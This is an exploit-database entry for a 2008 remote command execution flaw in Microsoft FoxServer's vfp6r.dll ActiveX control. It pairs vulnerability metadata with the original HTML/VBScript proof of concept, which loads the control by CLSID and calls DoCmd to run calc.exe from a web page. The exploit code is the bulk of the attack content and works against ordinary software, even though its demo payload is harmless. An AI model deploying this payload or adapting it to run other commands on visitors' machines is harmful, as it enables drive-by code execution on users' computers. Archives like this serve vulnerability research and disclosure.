header-logo
Suggest Exploit
vendor:
FoxServer
by:
shinnai
7.5
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: FoxServer
Affected Version From: 6.0.8862.0
Affected Version To: 6.0.8862.0
Patch Exists: NO
Related CWE: N/A
CPE: a:microsoft:foxserver:6.0.8862.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Professional SP2
2008

Microsoft FoxServer (vfp6r.dll 6.0.8862.0) Remote Command Execution

Using the 'DoCmd()' function, an attacker can run applications passed as argument.

Mitigation:

Ensure that the 'DoCmd()' function is not used in vulnerable applications.
Source

Exploit-DB raw data:

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
 <b>Microsoft FoxServer (vfp6r.dll 6.0.8862.0) Remote Command Execution</b>
 url: http://www.microsoft.com

 Author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org

 <b><font color='red'>This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.</font></b>

 Not much more to say than using "DoCmd()" function, you can run
 applications passed as argument.

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-----------------------------------------------------------------------------
<object classid='clsid:008B6010-1F3D-11D1-B0C8-00A0C9055D74' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'>
  Sub tryMe
   test.DoCmd "RUN calc.exe"
  End Sub
</script>

</span></span>
</code></pre>

# milw0rm.com [2008-01-09]